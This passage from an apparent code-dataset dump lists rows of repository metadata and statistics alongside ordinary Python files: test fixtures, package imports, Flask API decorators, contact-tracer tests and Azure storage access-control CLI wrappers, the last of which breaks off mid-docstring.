| 18.42 | 50 | 0.611292 | 138 | 921 | 3.949275 | 0.202899 | 0.073395 | 0.121101 | 0.110092 | 0.869725 | 0.869725 | 0.869725 | 0.869725 | 0.836697 | 0.704587 | 0 | 0.037627 | 0.249729 | 921 | 49 | 51 | 18.795918 | 0.751085 | 0 | 0 | 0.727273 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.121212 | 1 | 0.30303 | false | 0 | 0.030303 | 0.181818 | 0.515152 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 9 |
40e56f6381e6d31e7a025ce651400a41dacfcbbb | 332 | py | Python | tests/unit_tests/backend/samples.py | necromuralist/packet_capture | 34cf57856234fc193860ea11af9f2ab81478daad | [
"MIT"
] | null | null | null | tests/unit_tests/backend/samples.py | necromuralist/packet_capture | 34cf57856234fc193860ea11af9f2ab81478daad | [
"MIT"
] | 1 | 2018-06-10T21:33:23.000Z | 2018-06-10T21:33:23.000Z | tests/unit_tests/backend/samples.py | necromuralist/alpaca | 34cf57856234fc193860ea11af9f2ab81478daad | [
"MIT"
] | null | null | null | OUTPUT = """File name: /home/erysichthon/usbstick/packets/channel_6.pcap0
First packet time: 2018-06-16 16:32:42.322949
Last packet time: 2018-06-17 17:05:17.160418"""
FILE_NAME = "/home/erysichthon/usbstick/packets/channel_6.pcap0"
FIRST_TIME = "2018-06-16 16:32:42.322949"
LAST_TIME = "2018-06-17 17:05:17.160418"
| 41.5 | 83 | 0.71988 | 57 | 332 | 4.105263 | 0.403509 | 0.136752 | 0.17094 | 0.196581 | 0.923077 | 0.923077 | 0.923077 | 0.923077 | 0.717949 | 0.478632 | 0 | 0.289655 | 0.126506 | 332 | 7 | 84 | 47.428571 | 0.517241 | 0 | 0 | 0 | 0 | 0 | 0.810241 | 0.301205 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
40e87c2299e7f46357f1df1c58c38e73dd3f65c7 | 118 | py | Python | oggm/utils/__init__.py | skachuck/oggm | b391e6923fb0c5269e10ea260f5199a26d5e1082 | [
"BSD-3-Clause"
] | 156 | 2015-10-11T16:38:43.000Z | 2022-03-24T04:19:16.000Z | oggm/utils/__init__.py | skachuck/oggm | b391e6923fb0c5269e10ea260f5199a26d5e1082 | [
"BSD-3-Clause"
] | 953 | 2015-10-11T16:26:14.000Z | 2022-03-27T23:19:19.000Z | oggm/utils/__init__.py | skachuck/oggm | b391e6923fb0c5269e10ea260f5199a26d5e1082 | [
"BSD-3-Clause"
] | 92 | 2015-10-19T08:53:23.000Z | 2022-03-28T08:00:17.000Z | # flake8: noqa
from oggm.utils._downloads import *
from oggm.utils._funcs import *
from oggm.utils._workflow import *
| 23.6 | 35 | 0.779661 | 17 | 118 | 5.235294 | 0.529412 | 0.269663 | 0.438202 | 0.426966 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009709 | 0.127119 | 118 | 4 | 36 | 29.5 | 0.854369 | 0.101695 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
40ed8f8b4fd156393606df33b281ff8d080342d8 | 127 | py | Python | plugins/dbnd-azure/tests/conftest.py | turbaszek/dbnd | 6efbf3e7ecd175645e8e58d0d015d32fe9e95ea0 | [
"Apache-2.0"
] | null | null | null | plugins/dbnd-azure/tests/conftest.py | turbaszek/dbnd | 6efbf3e7ecd175645e8e58d0d015d32fe9e95ea0 | [
"Apache-2.0"
] | null | null | null | plugins/dbnd-azure/tests/conftest.py | turbaszek/dbnd | 6efbf3e7ecd175645e8e58d0d015d32fe9e95ea0 | [
"Apache-2.0"
] | null | null | null | # inline conftest
pytest_plugins = [
"dbnd.testing.pytest_dbnd_plugin",
"dbnd.testing.pytest_dbnd_markers_plugin",
]
| 15.875 | 46 | 0.740157 | 15 | 127 | 5.866667 | 0.533333 | 0.25 | 0.386364 | 0.477273 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.149606 | 127 | 7 | 47 | 18.142857 | 0.814815 | 0.11811 | 0 | 0 | 0 | 0 | 0.636364 | 0.636364 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
dc173309d9568c53a1d3633ef79b6256f7bf5b9a | 186 | py | Python | shop/slugify.py | mohsenamoon1160417237/ECommerce-app | 4cca492214b04b56f625aef2a2979956a8256710 | [
"MIT"
] | null | null | null | shop/slugify.py | mohsenamoon1160417237/ECommerce-app | 4cca492214b04b56f625aef2a2979956a8256710 | [
"MIT"
] | null | null | null | shop/slugify.py | mohsenamoon1160417237/ECommerce-app | 4cca492214b04b56f625aef2a2979956a8256710 | [
"MIT"
] | null | null | null | def slugify(str):
str = str.replace(" " , "-")
str = str.replace("," , "-")
str = str.replace("(" , "")
str = str.replace(")" , "")
str = str.replace("؟" , "")
return str
| 20.666667 | 30 | 0.467742 | 21 | 186 | 4.190476 | 0.285714 | 0.409091 | 0.738636 | 0.727273 | 0.738636 | 0.738636 | 0.738636 | 0.738636 | 0.738636 | 0.738636 | 0 | 0 | 0.241935 | 186 | 8 | 31 | 23.25 | 0.617021 | 0 | 0 | 0 | 0 | 0 | 0.037634 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0 | 0 | 0.285714 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
90d6376e46b20330d0817e88f76967adb77d9bdf | 124 | py | Python | bflib/items/weapons/__init__.py | ChrisLR/BasicDungeonRL | b293d40bd9a0d3b7aec41b5e1d58441165997ff1 | [
"MIT"
] | 3 | 2017-10-28T11:28:38.000Z | 2018-09-12T09:47:00.000Z | bflib/items/weapons/__init__.py | ChrisLR/BasicDungeonRL | b293d40bd9a0d3b7aec41b5e1d58441165997ff1 | [
"MIT"
] | null | null | null | bflib/items/weapons/__init__.py | ChrisLR/BasicDungeonRL | b293d40bd9a0d3b7aec41b5e1d58441165997ff1 | [
"MIT"
] | null | null | null | from bflib.items.weapons.melee import *
from bflib.items.weapons.ranged import *
from bflib.items.weapons.throwing import *
| 31 | 42 | 0.806452 | 18 | 124 | 5.555556 | 0.444444 | 0.27 | 0.42 | 0.63 | 0.54 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.096774 | 124 | 3 | 43 | 41.333333 | 0.892857 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
29003d535953a5f52475602c6ef1f19415921fba | 3,879 | py | Python | python/test/environment/test_max_slot_contact_tracer.py | stacyvjong/PandemicSimulator | eca906f5dc8135d7c90a1582b96621235f745c17 | [
"Apache-2.0"
] | null | null | null | python/test/environment/test_max_slot_contact_tracer.py | stacyvjong/PandemicSimulator | eca906f5dc8135d7c90a1582b96621235f745c17 | [
"Apache-2.0"
] | null | null | null | python/test/environment/test_max_slot_contact_tracer.py | stacyvjong/PandemicSimulator | eca906f5dc8135d7c90a1582b96621235f745c17 | [
"Apache-2.0"
] | null | null | null | # Confidential, Copyright 2020, Sony Corporation of America, All rights reserved.
import pytest
import numpy as np
from orderedset import OrderedSet
from pandemic_simulator.environment import MaxSlotContactTracer, PersonID
@pytest.fixture
def contact_tracer():
return MaxSlotContactTracer(storage_slots=5, time_slot_scale=24)
def test_emtpy_contact_tracer(contact_tracer):
assert len(contact_tracer.get_contacts(PersonID('a', 10))) == 0
def test_contacts(contact_tracer):
p1 = PersonID('a', 30)
p2 = PersonID('b', 40)
p3 = PersonID('c', 50)
p4 = PersonID('d', 50)
contacts = OrderedSet([(p1, p2), (p2, p4)])
contact_tracer.add_contacts(contacts)
traces = contact_tracer.get_contacts(p1)
assert len(traces) == 1
assert p2 in traces
np.testing.assert_array_almost_equal(traces[p2], [1./24., 0., 0., 0., 0.])
traces = contact_tracer.get_contacts(p2)
assert len(traces) == 2
assert p1 in traces and p4 in traces
np.testing.assert_array_almost_equal(traces[p1], [1./24., 0., 0., 0., 0.])
np.testing.assert_array_almost_equal(traces[p4], [1./24., 0., 0., 0., 0.])
traces = contact_tracer.get_contacts(p4)
assert len(traces) == 1
assert p2 in traces
np.testing.assert_array_almost_equal(traces[p2], [1./24., 0., 0., 0., 0.])
contacts = OrderedSet([(p1, p2), (p3, p4)])
contact_tracer.add_contacts(contacts)
traces = contact_tracer.get_contacts(p1)
assert len(traces) == 1
assert p2 in traces
np.testing.assert_array_almost_equal(traces[p2], [2./24., 0., 0., 0., 0.])
traces = contact_tracer.get_contacts(p2)
assert len(traces) == 2
assert p1 in traces and p4 in traces
np.testing.assert_array_almost_equal(traces[p1], [2./24., 0., 0., 0., 0.])
np.testing.assert_array_almost_equal(traces[p4], [1./24., 0., 0., 0., 0.])
traces = contact_tracer.get_contacts(p4)
assert len(traces) == 2
assert p2 in traces and p3 in traces
np.testing.assert_array_almost_equal(traces[p2], [1./24., 0., 0., 0., 0.])
np.testing.assert_array_almost_equal(traces[p3], [1./24., 0., 0., 0., 0.])
contact_tracer.new_time_slot()
traces = contact_tracer.get_contacts(p2)
assert len(traces) == 2
assert p1 in traces and p4 in traces
np.testing.assert_array_almost_equal(traces[p1], [0., 2./24., 0., 0., 0.])
np.testing.assert_array_almost_equal(traces[p4], [0., 1./24., 0., 0., 0.])
contacts = OrderedSet([(p1, p2)])
contact_tracer.add_contacts(contacts)
traces = contact_tracer.get_contacts(p2)
assert len(traces) == 2
assert p1 in traces and p4 in traces
np.testing.assert_array_almost_equal(traces[p1], [1/24., 2./24., 0., 0., 0.])
np.testing.assert_array_almost_equal(traces[p4], [0., 1./24., 0., 0., 0.])
def test_contact_removal(contact_tracer):
p1 = PersonID('a', 30)
p2 = PersonID('b', 40)
p3 = PersonID('c', 50)
contacts = OrderedSet([(p1, p2), (p2, p3)])
contact_tracer.add_contacts(contacts)
traces = contact_tracer.get_contacts(p1)
assert len(traces) == 1
assert p2 in traces
np.testing.assert_array_almost_equal(traces[p2], [1./24., 0., 0., 0., 0.])
traces = contact_tracer.get_contacts(p2)
assert len(traces) == 2
assert p1 in traces and p3 in traces
np.testing.assert_array_almost_equal(traces[p1], [1./24., 0., 0., 0., 0.])
np.testing.assert_array_almost_equal(traces[p3], [1./24., 0., 0., 0., 0.])
for _ in range(5):
contact_tracer.new_time_slot()
contacts = OrderedSet([(p2, p3)])
contact_tracer.add_contacts(contacts)
traces = contact_tracer.get_contacts(p1)
assert len(traces) == 0
traces = contact_tracer.get_contacts(p2)
assert len(traces) == 1
assert p3 in traces
np.testing.assert_array_almost_equal(traces[p3], [1./24., 1./24., 1./24., 1./24., 1./24.])
| 34.026316 | 94 | 0.664862 | 593 | 3,879 | 4.166948 | 0.112985 | 0.035613 | 0.033994 | 0.137596 | 0.823553 | 0.798462 | 0.778227 | 0.760421 | 0.755565 | 0.755565 | 0 | 0.073899 | 0.180201 | 3,879 | 113 | 95 | 34.327434 | 0.703145 | 0.020366 | 0 | 0.674699 | 0 | 0 | 0.002106 | 0 | 0 | 0 | 0 | 0 | 0.493976 | 1 | 0.048193 | false | 0 | 0.048193 | 0.012048 | 0.108434 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
4647589dc7bd4e62fa2ed4f2a3f494d5b85d563e | 2,510 | py | Python | flask_unchained/bundles/api/decorators.py | achiang/flask-unchained | 12788a6e618904a25ff2b571eb05ff1dc8f1840f | [
"MIT"
] | null | null | null | flask_unchained/bundles/api/decorators.py | achiang/flask-unchained | 12788a6e618904a25ff2b571eb05ff1dc8f1840f | [
"MIT"
] | null | null | null | flask_unchained/bundles/api/decorators.py | achiang/flask-unchained | 12788a6e618904a25ff2b571eb05ff1dc8f1840f | [
"MIT"
] | null | null | null | from functools import wraps
from http import HTTPStatus
from flask import abort, request
def list_loader(*decorator_args, model):
"""
Decorator to automatically query the database for all records of a model.
:param model: The model class to query
"""
def wrapped(fn):
@wraps(fn)
def decorated(*args, **kwargs):
return fn(model.query.all())
return decorated
if decorator_args and callable(decorator_args[0]):
return wrapped(decorator_args[0])
return wrapped
def patch_loader(*decorator_args, serializer):
"""
Decorator to automatically load and (partially) update a model from json
request data
:param serializer: The ModelSerializer to use to load data from the request
"""
def wrapped(fn):
@wraps(fn)
def decorated(*args, **kwargs):
result = serializer.load(request.get_json(),
instance=kwargs.pop('instance'),
partial=True)
if not result.errors and not result.data.id:
abort(HTTPStatus.NOT_FOUND)
return fn(*result)
return decorated
if decorator_args and callable(decorator_args[0]):
return wrapped(decorator_args[0])
return wrapped
def put_loader(*decorator_args, serializer):
"""
Decorator to automatically load and update a model from json request data
:param serializer: The ModelSerializer to use to load data from the request
"""
def wrapped(fn):
@wraps(fn)
def decorated(*args, **kwargs):
result = serializer.load(request.get_json(),
instance=kwargs.pop('instance'))
if not result.errors and not result.data.id:
abort(HTTPStatus.NOT_FOUND)
return fn(*result)
return decorated
if decorator_args and callable(decorator_args[0]):
return wrapped(decorator_args[0])
return wrapped
def post_loader(*decorator_args, serializer):
"""
Decorator to automatically instantiate a model from json request data
:param serializer: The ModelSerializer to use to load data from the request
"""
def wrapped(fn):
@wraps(fn)
def decorated(*args, **kwargs):
return fn(*serializer.load(request.get_json()))
return decorated
if decorator_args and callable(decorator_args[0]):
return wrapped(decorator_args[0])
return wrapped
| 30.240964 | 79 | 0.630677 | 297 | 2,510 | 5.245791 | 0.195286 | 0.133504 | 0.071887 | 0.102696 | 0.837612 | 0.819641 | 0.819641 | 0.785623 | 0.785623 | 0.708601 | 0 | 0.004464 | 0.286056 | 2,510 | 82 | 80 | 30.609756 | 0.864955 | 0.228685 | 0 | 0.75 | 0 | 0 | 0.008625 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.0625 | 0.041667 | 0.645833 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 9 |
46af57651fb206ada860fc06ab94fe0502705059 | 172 | py | Python | klar_eda/preprocess/__init__.py | Sibasish-Padhy/klar-EDA | 6186981fda87e367a0013d4568e7f2fd094e56ed | [
"MIT"
] | 17 | 2020-09-27T12:18:32.000Z | 2022-02-27T13:54:12.000Z | klar_eda/preprocess/__init__.py | Sibasish-Padhy/klar-EDA | 6186981fda87e367a0013d4568e7f2fd094e56ed | [
"MIT"
] | 32 | 2020-09-27T18:48:23.000Z | 2022-03-01T04:48:57.000Z | klar_eda/preprocess/__init__.py | Sibasish-Padhy/klar-EDA | 6186981fda87e367a0013d4568e7f2fd094e56ed | [
"MIT"
] | 27 | 2020-09-27T12:30:38.000Z | 2022-02-24T18:48:30.000Z | from . import constants
from . import csv_preprocess
from . import image_preprocess
from . import preprocess
import pkg_resources
pkg_resources.declare_namespace(__name__)
| 24.571429 | 41 | 0.848837 | 22 | 172 | 6.227273 | 0.5 | 0.291971 | 0.291971 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.110465 | 172 | 6 | 42 | 28.666667 | 0.895425 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.833333 | 0 | 0.833333 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
d3c3ac844101ce71034298832dd7fcedb91edb1d | 2,974 | py | Python | tests/test_tsv_to_membership.py | phac-nml/biocanon | 10c859ed7a15c8fcaab283aed94b082e26b920bb | [
"Apache-2.0"
] | 1 | 2021-01-18T03:39:40.000Z | 2021-01-18T03:39:40.000Z | tests/test_tsv_to_membership.py | phac-nml/biocanon | 10c859ed7a15c8fcaab283aed94b082e26b920bb | [
"Apache-2.0"
] | 2 | 2020-06-23T18:44:16.000Z | 2020-06-25T17:03:25.000Z | tests/test_tsv_to_membership.py | phac-nml/bioCanon | 3797a16d3782f1784105ce1f6a4661aa69d0a150 | [
"MIT"
] | null | null | null | from bioCanon import __main__
import os
def test_groups_path():
group_info = os.path.join(os.getcwd(), "tests", "examples", "testing.tsv")
case = __main__.tsv_to_membership(group_info)
compare = {'A': ['1', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
'B': ['2', '2.1', '2.1.1', '2.1.1.1', '2.1.1.1.1', 0, 0, 0, 0, 0, 0, 0],
'C': ['2', '2.1', '2.1.1', '2.1.1.2', '2.1.1.2.1', 0, 0, 0, 0, 0, 0, 0],
'D': ['2', '2.2', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
'E': ['2', '2.1', '2.1.2', '2.1.2.1', '2.1.1.1.2', 0, 0, 0, 0, 0, 0, 0],
'F': ['2', '2.1', '2.1.1', '2.1.1.1', '2.1.1.1.2', '2.1.1.1.2.2', 0, 0, 0, 0, 0, 0],
'G': ['2', '2.1', '2.1.1', '2.1.1.1', '2.1.1.1.2', '2.1.1.1.2.1',
'2.1.1.1.2.1.2', 0, 0, 0, 0, 0],
'H': ['2', '2.1', '2.1.1', '2.1.1.1', '2.1.1.1.2', '2.1.1.1.2.1', '2.1.1.1.2.1.1',
'2.1.1.1.2.1.1.2', 0, 0, 0, 0],
'I': ['2', '2.1', '2.1.1', '2.1.1.1', '2.1.1.1.2', '2.1.1.1.2.1', '2.1.1.1.2.1.1',
'2.1.1.1.2.1.1.1', '2.1.1.1.2.1.1.1.2', 0, 0, 0],
'J': ['2', '2.1', '2.1.1', '2.1.1.1', '2.1.1.1.2', '2.1.1.1.2.1', '2.1.1.1.2.1.1',
'2.1.1.1.2.1.1.1', '2.1.1.1.2.1.1.1.1', '2.1.1.1.2.1.1.1.1.2', 0, 0],
'K': ['2', '2.1', '2.1.2', '2.1.2.2', '2.1.2.2.2', 0, 0, 0, 0, 0, 0, 0],
'L': ['2', '2.1', '2.1.2', '2.1.2.2', '2.1.2.2.2', 0, 0, 0, 0, 0, 0, 0],
'M': ['2', '2.1', '2.1.2', '2.1.2.2', '2.1.2.2.1', 0, 0, 0, 0, 0, 0, 0],
'N': ['2', '2.1', '2.1.2', '2.1.2.2', '2.1.2.2.1', 0, 0, 0, 0, 0, 0, 0],
'O': ['2', '2.1', '2.1.1', '2.1.1.1', '2.1.1.1.2', '2.1.1.1.2.1', '2.1.1.1.2.1.1',
'2.1.1.1.2.1.1.1', '2.1.1.1.2.1.1.1.1', '2.1.1.1.2.1.1.1.1.1',
'2.1.1.1.2.1.1.1.1.1.2', 0],
'P': ['2', '2.1', '2.1.1', '2.1.1.1', '2.1.1.1.2', '2.1.1.1.2.1', '2.1.1.1.2.1.1',
'2.1.1.1.2.1.1.1', '2.1.1.1.2.1.1.1.1', '2.1.1.1.2.1.1.1.1.1',
'2.1.1.1.2.1.1.1.1.1.2', 0],
'Q': ['2', '2.1', '2.1.1', '2.1.1.1', '2.1.1.1.2', '2.1.1.1.2.1', '2.1.1.1.2.1.1',
'2.1.1.1.2.1.1.1', '2.1.1.1.2.1.1.1.1', '2.1.1.1.2.1.1.1.1.1',
'2.1.1.1.2.1.1.1.1.1.1', 0],
'R': ['2', '2.1', '2.1.1', '2.1.1.1', '2.1.1.1.2', '2.1.1.1.2.1', '2.1.1.1.2.1.1',
'2.1.1.1.2.1.1.1', '2.1.1.1.2.1.1.1.1', '2.1.1.1.2.1.1.1.1.1',
'2.1.1.1.2.1.1.1.1.1.1', 0],
'S': ['2', '2.1', '2.1.1', '2.1.1.1', '2.1.1.1.2', '2.1.1.1.2.2', 0, 0, 0, 0, 0, 0],
'T': ['2', '2.1', '2.1.1', '2.1.1.2', '2.1.1.2.2', 0, 0, 0, 0, 0, 0, 0],
'U': ['2', '2.1', '2.1.1', '2.1.1.2', '2.1.1.2.2', 0, 0, 0, 0, 0, 0, 0],
'V': ['2', '2.2', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]}
assert case == compare
| 69.162791 | 99 | 0.311029 | 790 | 2,974 | 1.153165 | 0.059494 | 0.485181 | 0.378705 | 0.434687 | 0.807903 | 0.807903 | 0.805708 | 0.794731 | 0.781559 | 0.748628 | 0 | 0.353846 | 0.300605 | 2,974 | 42 | 100 | 70.809524 | 0.084135 | 0 | 0 | 0.2 | 0 | 0.1 | 0.37996 | 0.028245 | 0 | 0 | 0 | 0 | 0.025 | 1 | 0.025 | false | 0 | 0.05 | 0 | 0.075 | 0 | 0 | 0 | 1 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 12 |
d3c7912c846264ecc0baa74dec30c302f3f49962 | 12,880 | py | Python | pyaz/storage/fs/access/__init__.py | py-az-cli/py-az-cli | 9a7dc44e360c096a5a2f15595353e9dad88a9792 | [
"MIT"
] | null | null | null | pyaz/storage/fs/access/__init__.py | py-az-cli/py-az-cli | 9a7dc44e360c096a5a2f15595353e9dad88a9792 | [
"MIT"
] | null | null | null | pyaz/storage/fs/access/__init__.py | py-az-cli/py-az-cli | 9a7dc44e360c096a5a2f15595353e9dad88a9792 | [
"MIT"
] | 1 | 2022-02-03T09:12:01.000Z | 2022-02-03T09:12:01.000Z | '''
Manage file system access and permissions for Azure Data Lake Storage Gen2 account.
'''
from .... pyaz_utils import _call_az
def set(account_key=None, account_name=None, acl=None, auth_mode=None, connection_string=None, group=None, owner=None, permissions=None, sas_token=None):
'''
Set the access control properties of a path(directory or file) in Azure Data Lake Storage Gen2 account.
Optional Parameters:
- account_key -- Storage account key. Must be used in conjunction with storage account name. Environment variable: AZURE_STORAGE_KEY
- account_name -- Storage account name. Related environment variable: AZURE_STORAGE_ACCOUNT. Must be used in conjunction with either storage account key or a SAS token. If neither are present, the command will try to query the storage account key using the authenticated Azure account. If a large number of storage commands are executed the API quota may be hit
- acl -- Sets POSIX access control rights on files and directories. The value is a comma-separated list of access control entries. Each access control entry (ACE) consists of a scope, a type, a user or group identifier, and permissions in the format "[scope:][type]:[id]:[permissions]". permissions and acl are mutually exclusive.
- auth_mode -- The mode in which to run the command. "login" mode will directly use your login credentials for the authentication. The legacy "key" mode will attempt to query for an account key if no authentication parameters for the account are provided. Environment variable: AZURE_STORAGE_AUTH_MODE
- connection_string -- Storage account connection string. Environment variable: AZURE_STORAGE_CONNECTION_STRING
- group -- Optional. The owning group of the file or directory.
- owner -- Optional. The owner of the file or directory.
- permissions -- Optional and only valid if Hierarchical Namespace is enabled for the account. Sets POSIX access permissions for the file owner, the file owning group, and others. Each class may be granted read, write, or execute permission. The sticky bit is also supported. Both symbolic (rwxrw-rw-) and 4-digit octal notation (e.g. 0766) are supported. permissions and acl are mutually exclusive.
- sas_token -- A Shared Access Signature (SAS). Must be used in conjunction with storage account name. Environment variable: AZURE_STORAGE_SAS_TOKEN
'''
return _call_az("az storage fs access set", locals())
def show(account_key=None, account_name=None, auth_mode=None, connection_string=None, sas_token=None):
'''
Show the access control properties of a path (directory or file) in Azure Data Lake Storage Gen2 account.
Optional Parameters:
- account_key -- Storage account key. Must be used in conjunction with storage account name. Environment variable: AZURE_STORAGE_KEY
- account_name -- Storage account name. Related environment variable: AZURE_STORAGE_ACCOUNT. Must be used in conjunction with either storage account key or a SAS token. If neither are present, the command will try to query the storage account key using the authenticated Azure account. If a large number of storage commands are executed the API quota may be hit
- auth_mode -- The mode in which to run the command. "login" mode will directly use your login credentials for the authentication. The legacy "key" mode will attempt to query for an account key if no authentication parameters for the account are provided. Environment variable: AZURE_STORAGE_AUTH_MODE
- connection_string -- Storage account connection string. Environment variable: AZURE_STORAGE_CONNECTION_STRING
- sas_token -- A Shared Access Signature (SAS). Must be used in conjunction with storage account name. Environment variable: AZURE_STORAGE_SAS_TOKEN
'''
return _call_az("az storage fs access show", locals())
def set_recursive(acl, account_key=None, account_name=None, auth_mode=None, batch_size=None, connection_string=None, continuation=None, continue_on_failure=None, max_batches=None, sas_token=None, timeout=None):
'''
Set the Access Control on a path and sub-paths in Azure Data Lake Storage Gen2 account.
Required Parameters:
- acl -- The value is a comma-separated list of access control entries. Each access control entry (ACE) consists of a scope, a type, a user or group identifier, and permissions in the format "[scope:][type]:[id]:[permissions]". For more information, please refer to https://docs.microsoft.com/azure/storage/blobs/data-lake-storage-access-control.
Optional Parameters:
- account_key -- Storage account key. Must be used in conjunction with storage account name. Environment variable: AZURE_STORAGE_KEY
- account_name -- Storage account name. Related environment variable: AZURE_STORAGE_ACCOUNT. Must be used in conjunction with either storage account key or a SAS token. If neither are present, the command will try to query the storage account key using the authenticated Azure account. If a large number of storage commands are executed the API quota may be hit
- auth_mode -- The mode in which to run the command. "login" mode will directly use your login credentials for the authentication. The legacy "key" mode will attempt to query for an account key if no authentication parameters for the account are provided. Environment variable: AZURE_STORAGE_AUTH_MODE
- batch_size -- Optional. If data set size exceeds batch size then operation will be split into multiple requests so that progress can be tracked. Batch size should be between 1 and 2000. The default when unspecified is 2000.
- connection_string -- Storage account connection string. Environment variable: AZURE_STORAGE_CONNECTION_STRING
- continuation -- Optional continuation token that can be used to resume previously stopped operation.
- continue_on_failure -- If set to False, the operation will terminate quickly on encountering user errors (4XX). If True, the operation will ignore user errors and proceed with the operation on other sub-entities of the directory. Continuation token will only be returned when --continue-on-failure is True in case of user errors. If not set the default value is False for this.
- max_batches -- Optional. Define maximum number of batches that single change Access Control operation can execute. If maximum is reached before all sub-paths are processed, then continuation token can be used to resume operation. Empty value indicates that maximum number of batches in unbound and operation continues till end.
- sas_token -- A Shared Access Signature (SAS). Must be used in conjunction with storage account name. Environment variable: AZURE_STORAGE_SAS_TOKEN
- timeout -- Request timeout in seconds. Applies to each call to the service.
'''
return _call_az("az storage fs access set-recursive", locals())
def update_recursive(acl, account_key=None, account_name=None, auth_mode=None, batch_size=None, connection_string=None, continuation=None, continue_on_failure=None, max_batches=None, sas_token=None, timeout=None):
'''
Modify the Access Control on a path and sub-paths in Azure Data Lake Storage Gen2 account.
Required Parameters:
- acl -- The value is a comma-separated list of access control entries. Each access control entry (ACE) consists of a scope, a type, a user or group identifier, and permissions in the format "[scope:][type]:[id]:[permissions]". For more information, please refer to https://docs.microsoft.com/azure/storage/blobs/data-lake-storage-access-control.
Optional Parameters:
- account_key -- Storage account key. Must be used in conjunction with storage account name. Environment variable: AZURE_STORAGE_KEY
- account_name -- Storage account name. Related environment variable: AZURE_STORAGE_ACCOUNT. Must be used in conjunction with either storage account key or a SAS token. If neither are present, the command will try to query the storage account key using the authenticated Azure account. If a large number of storage commands are executed the API quota may be hit
- auth_mode -- The mode in which to run the command. "login" mode will directly use your login credentials for the authentication. The legacy "key" mode will attempt to query for an account key if no authentication parameters for the account are provided. Environment variable: AZURE_STORAGE_AUTH_MODE
- batch_size -- Optional. If data set size exceeds batch size then operation will be split into multiple requests so that progress can be tracked. Batch size should be between 1 and 2000. The default when unspecified is 2000.
- connection_string -- Storage account connection string. Environment variable: AZURE_STORAGE_CONNECTION_STRING
- continuation -- Optional continuation token that can be used to resume previously stopped operation.
